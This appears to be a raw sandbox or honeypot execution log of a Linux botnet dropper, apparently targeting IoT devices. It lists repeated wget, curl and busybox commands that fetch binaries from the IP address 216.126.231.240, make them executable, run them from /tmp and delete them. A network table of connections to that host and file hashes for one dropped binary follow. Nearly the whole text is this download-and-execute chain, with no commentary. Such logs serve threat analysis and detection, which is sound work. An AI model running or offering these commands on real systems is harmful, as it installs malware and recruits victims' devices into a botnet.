/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/chmod

[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X

[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/rm

[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/wget

[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/chmod

[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l

[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/rm

[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/wget

[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/chmod

[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc

[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/rm

[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/wget

[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/chmod

[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv

[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/rm

[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97